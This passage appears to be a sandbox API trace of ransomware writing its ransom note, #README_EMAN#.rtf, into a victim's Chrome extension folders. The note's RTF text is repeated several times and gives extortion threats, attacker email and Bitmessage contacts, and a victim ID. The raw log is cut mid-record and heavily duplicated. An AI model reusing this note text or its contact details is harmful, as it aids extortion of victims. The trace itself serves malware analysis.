\\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nSë\x91W[d¼\"òÈF\x17þê\x89|ó¢kö\x97pcÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.062] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.063] CloseHandle (hObject=0x294) returned 1 [0285.063] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\#readme_eman#.rtf")) returned 0xffffffff [0285.063] GetLastError () returned 0x2 [0285.063] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.064] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.064] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.064] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't 